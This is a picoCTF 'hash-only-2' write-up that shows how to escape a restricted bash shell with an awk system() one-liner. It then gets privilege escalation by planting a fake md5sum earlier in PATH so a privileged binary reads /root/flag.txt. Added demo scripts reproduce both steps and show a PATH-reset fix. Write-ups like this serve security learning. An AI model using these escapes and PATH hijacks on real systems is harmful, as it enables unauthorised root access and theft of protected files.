
Hitanshu Gedam

picoCTF hash-only-2 writeup

Hello, hackers!

In this challenge, we were asked to SSH into a remote machine using the provided credentials. After logging in, I quickly realized that we had been dropped into a restricted Bash shell (rbash). Basic things like cd, running a binary by path (e.g. /bin/bash) or changing PATH were refused, making it clear that the environment was intentionally limited.


🛠 Escaping Restricted Shell with awk

While exploring ways to escape, I recalled that awk can execute system commands. I had just started learning awk, so I looked up how to use it for shell escaping — and found a reliable one-liner:

awk 'BEGIN {system("/bin/bash")}'

Explanation:

  • awk runs the BEGIN block before processing any input.
  • system("/bin/bash") hands that string to /bin/sh, which starts a new Bash process. Nothing tells that process to be restricted, so it is an ordinary, unrestricted shell.
  • This trick is commonly used to escape rbash or other restricted environments in CTFs: rbash only constrains what the shell itself will do, not what the programs it is still allowed to run can do.

Once this command was executed, I successfully escaped the restricted shell and gained a regular Bash session, in which cd, absolute paths and PATH assignments all worked again.
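To see exactly what rbash forbids and why the awk trick gets around it, here is an added example (it is not from the original post) that starts a throwaway restricted shell with bash -r, confirms that cd, a slash-qualified command name and a PATH assignment are all refused, and then has awk spawn an unrestricted bash from inside it. It assumes bash and awk are installed; the payload for the escaped shell is passed through an environment variable (PAYLOAD, a name chosen here) only to avoid nested quoting.

```shell
#!/bin/sh
# Added example: demonstrating rbash restrictions and the awk system() escape.
# Assumes bash and awk are on PATH. Not part of the original writeup.

# Run one command line inside a fresh restricted bash (bash -r behaves like rbash).
in_rbash() {
    bash -r -c "$1" 2>/dev/null
}

# Succeed only if all three classic restrictions are enforced:
# cd is refused, a command name containing "/" is refused, PATH is read-only.
rbash_blocks() {
    ! in_rbash 'cd /' &&
    ! in_rbash '/bin/echo x' &&
    ! in_rbash 'PATH=/tmp'
}

# The escape from the writeup, run inside rbash: awk is an ordinary command
# (no slash in its name, so rbash allows it), and its system() hands a string
# to /bin/sh, which starts a normal, unrestricted /bin/bash. $1 is the command
# the new bash runs; it travels via the environment so it needs no extra quoting.
escape_via_awk() {
    PAYLOAD="$1"
    export PAYLOAD
    in_rbash 'awk '\''BEGIN { system("/bin/bash -c \"$PAYLOAD\"") }'\'''
}

# Demo: the restrictions hold, yet the bash spawned by awk can cd freely.
if rbash_blocks; then
    echo "rbash refused cd, /bin/echo and PATH= as expected"
fi
echo "escaped shell reports cwd: $(escape_via_awk 'cd / && pwd')"
```

The escaped bash inherits the restricted shell's environment (including its PATH), but since it is not restricted, it can change PATH, which is what the rest of the challenge depends on.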


Discovering the Target Binary

With unrestricted access, I began searching the system for binaries of interest. Using find, I located the target file:

/usr/local/bin/flaghasher

Running this binary printed an MD5 digest followed by the filename /root/flag.txt, exactly what md5sum /root/flag.txt would print. So we now knew where the flag lived, but we couldn’t read /root/flag.txt directly as a regular user; whatever flaghasher does, it reads that file with more privilege than we have (ls -l /usr/local/bin/flaghasher is the place to check for a setuid bit).


Exploiting the md5sum Call

Based on experience with a previous challenge (hash-only-1), I suspected the binary might be calling md5sum internally to compute the hash. If so, and if it relied on the PATH inherited from our environment rather than an absolute path such as /usr/bin/md5sum, we could potentially override the md5sum command with our own script.

After a quick consultation with ChatGPT (thanks!), I created a malicious md5sum script in the current directory:

cat > md5sum <<'EOF'
#!/bin/bash
cat "$1"
cat /root/flag.txt
EOF

Line-by-Line Explanation:

  • cat > md5sum <<'EOF': Creates a file named md5sum and writes the following content into it.
  • #!/bin/bash: Standard shebang line — tells the system to run the script using Bash.
  • cat "$1": Outputs the contents of the first argument passed to md5sum (i.e. the file it was asked to hash, here /root/flag.txt).
  • cat /root/flag.txt: Appends the contents of the actual flag file. Either line only works because the parent process (flaghasher) runs md5sum as root, so our script runs as root too. One caveat: Bash drops an effective UID that differs from the real UID at startup unless it is started with -p, so if a binary only changed its effective UID the shebang would need to be #!/bin/bash -p; here the plain shebang was enough.

Next, I made the script executable:

chmod +x md5sum

Then, I modified the PATH variable so that the shell would use our fake version of md5sum before looking in system directories:

export PATH=.:$PATH

This ensures that any call to md5sum that goes through PATH lookup will execute our malicious script. Two details matter: the "." entry is resolved against the working directory of the process doing the lookup, so flaghasher must be run from the directory holding the fake md5sum (or use an absolute directory instead of "."), and this PATH change is only possible because we escaped rbash, which treats PATH as read-only. The underlying bug is that flaghasher resolves md5sum through a PATH it inherited from an unprivileged caller; calling md5sum by absolute path or resetting PATH before the call would close it.
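Here is an added, self-contained demonstration of the PATH hijack (not the challenge's flaghasher, whose source we never saw) that runs as an ordinary user: it builds a scratch directory with a constructed flag file, a fake md5sum that leaks its argument, a victim script that calls md5sum through PATH the way we assumed flaghasher does, and a hardened victim that resets PATH first. The privilege boundary is not modelled (everything runs as you), so it shows the lookup-order problem and its fix, not the setuid part; DEMO, victim_vuln and victim_fixed are names chosen for this example.

```shell
#!/bin/sh
# Added example: PATH hijack of an unqualified md5sum call, plus the fix.
# Everything runs as the current user in a temp dir; flag.txt is a constructed
# stand-in for /root/flag.txt. Not part of the original writeup.

setup_demo() {
    DEMO=$(mktemp -d) || return 1
    printf 'picoCTF{constructed_stand_in_flag}\n' > "$DEMO/flag.txt"

    # Attacker-controlled directory holding the fake md5sum (the writeup's ".").
    mkdir "$DEMO/evil"
    cat > "$DEMO/evil/md5sum" <<'EOF'
#!/bin/sh
# Fake md5sum: instead of hashing, leak the file it was asked to hash.
echo "HIJACKED: $(cat "$1")"
EOF
    chmod +x "$DEMO/evil/md5sum"

    # Vulnerable victim: resolves md5sum through whatever PATH it inherited,
    # which is what a system("md5sum ...") call in flaghasher would do.
    printf '#!/bin/sh\nmd5sum "$1"\n' > "$DEMO/victim_vuln"

    # Hardened victim: resets PATH to trusted directories before the call, so
    # the caller's PATH cannot influence which md5sum runs.
    printf '#!/bin/sh\nPATH=/usr/bin:/bin\nexport PATH\nmd5sum "$1"\n' > "$DEMO/victim_fixed"

    chmod +x "$DEMO/victim_vuln" "$DEMO/victim_fixed"
}

# Run one of the victims with the attacker directory first in PATH, i.e. the
# writeup's "export PATH=.:$PATH" with the scratch dir standing in for ".".
run_with_hijacked_path() {
    PATH="$DEMO/evil:$PATH" "$DEMO/$1" "$DEMO/flag.txt"
}

# Genuine digest of the flag file, for comparison with the hardened victim.
real_hash() {
    md5sum "$DEMO/flag.txt"
}

cleanup_demo() {
    rm -rf "$DEMO"
}

# Demo: the vulnerable victim leaks the file, the hardened one hashes it.
setup_demo
echo "vulnerable victim: $(run_with_hijacked_path victim_vuln)"
echo "hardened victim:   $(run_with_hijacked_path victim_fixed)"
cleanup_demo
```

The same lookup-order rule is why the writeup's fake md5sum is found first: PATH is searched left to right, and the first executable named md5sum wins, whoever owns it.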


Result

I ran the flaghasher binary again — and this time, thanks to the overridden md5sum, the contents of /root/flag.txt were printed directly to the screen.

Flag captured. Mission complete. ✅

